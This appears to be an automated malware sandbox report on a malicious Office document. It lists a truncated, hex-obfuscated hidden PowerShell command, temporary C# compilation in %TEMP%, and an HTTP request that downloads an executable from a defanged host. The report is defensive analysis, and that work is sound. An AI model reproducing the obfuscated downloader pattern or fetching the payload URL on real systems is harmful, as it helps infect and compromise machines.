Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function jc57f4 {param($x315a)$n1b663='j574a';$h6ea66='';for ($i=0; $i -lt $x315a.length;$i+=2){$t9827=[convert]::ToByte($x315a.Substring($i,2),16);$h6ea66+=[char]($t9827 ...
Modifies file system
Creates the following files
- %TEMP%\qtxt6q3l.0.cs
- %TEMP%\res7ec8.tmp
- %TEMP%\csc7eb7.tmp
- %TEMP%\zotr9ryl.out
- %TEMP%\zotr9ryl.cmdline
- %TEMP%\zotr9ryl.0.cs
- %TEMP%\eskqeyje.dll
- %TEMP%\rjlz7v8e.dll
- %TEMP%\qtxt6q3l.dll
- %TEMP%\res7283.tmp
- %TEMP%\res714b.tmp
- %TEMP%\res7051.tmp
- %TEMP%\jo_pds1x.dll
- %TEMP%\res6f95.tmp
- %TEMP%\zotr9ryl.dll
- %TEMP%\csc7273.tmp
- %TEMP%\csc7030.tmp
- %TEMP%\csc6f85.tmp
- %TEMP%\eskqeyje.out
- %TEMP%\eskqeyje.cmdline
- %TEMP%\eskqeyje.0.cs
- %TEMP%\rjlz7v8e.out
- %TEMP%\rjlz7v8e.cmdline
- %TEMP%\rjlz7v8e.0.cs
- %TEMP%\jo_pds1x.out
- %TEMP%\jo_pds1x.cmdline
- %TEMP%\jo_pds1x.0.cs
- %TEMP%\qtxt6q3l.out
- %TEMP%\qtxt6q3l.cmdline
- %TEMP%\csc713a.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{a0c31bc7-8f4b-4fd4-8aff-e2e7a04a9479}.tmp
Deletes the following files
- %TEMP%\res6f95.tmp
- %TEMP%\eskqeyje.dll
- %TEMP%\eskqeyje.cmdline
- %TEMP%\eskqeyje.0.cs
- %TEMP%\eskqeyje.pdb
- %TEMP%\jo_pds1x.cmdline
- %TEMP%\jo_pds1x.pdb
- %TEMP%\jo_pds1x.dll
- %TEMP%\zotr9ryl.out
- %TEMP%\jo_pds1x.0.cs
- %TEMP%\res7ec8.tmp
- %TEMP%\csc7eb7.tmp
- %TEMP%\zotr9ryl.pdb
- %TEMP%\zotr9ryl.0.cs
- %TEMP%\zotr9ryl.cmdline
- %TEMP%\eskqeyje.out
- %TEMP%\jo_pds1x.out
- %TEMP%\rjlz7v8e.cmdline
- %TEMP%\csc7273.tmp
- %TEMP%\csc6f85.tmp
- %TEMP%\res7051.tmp
- %TEMP%\csc7030.tmp
- %TEMP%\res714b.tmp
- %TEMP%\csc713a.tmp
- %TEMP%\res7283.tmp
- %TEMP%\qtxt6q3l.out
- %TEMP%\rjlz7v8e.0.cs
- %TEMP%\qtxt6q3l.pdb
- %TEMP%\qtxt6q3l.cmdline
- %TEMP%\qtxt6q3l.0.cs
- %TEMP%\qtxt6q3l.dll
- %TEMP%\rjlz7v8e.pdb
- %TEMP%\rjlz7v8e.dll
- %TEMP%\rjlz7v8e.out
- %TEMP%\zotr9ryl.dll
Network activity
TCP
HTTP GET requests
- http://pl##tech.id/fi/good2.exe
UDP
- DNS ASK pl##tech.id
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function jc57f4 {param($x315a)$n1b663='j574a';$h6ea66='';for ($i=0; $i -lt $x315a.length;$i+=2){$t9827=[convert]::ToByte($x315a.Substring($i,2),16);$h6ea66+=[char]($t9827 ...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qtxt6q3l.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jo_pds1x.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\rjlz7v8e.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\eskqeyje.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6F95.tmp" "%TEMP%\CSC6F85.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7051.tmp" "%TEMP%\CSC7030.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES714B.tmp" "%TEMP%\CSC713A.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7283.tmp" "%TEMP%\CSC7273.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zotr9ryl.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7EC8.tmp" "%TEMP%\CSC7EB7.tmp"' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qtxt6q3l.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jo_pds1x.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\rjlz7v8e.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\eskqeyje.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6F95.tmp" "%TEMP%\CSC6F85.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7051.tmp" "%TEMP%\CSC7030.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES714B.tmp" "%TEMP%\CSC713A.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7283.tmp" "%TEMP%\CSC7273.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zotr9ryl.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7EC8.tmp" "%TEMP%\CSC7EB7.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
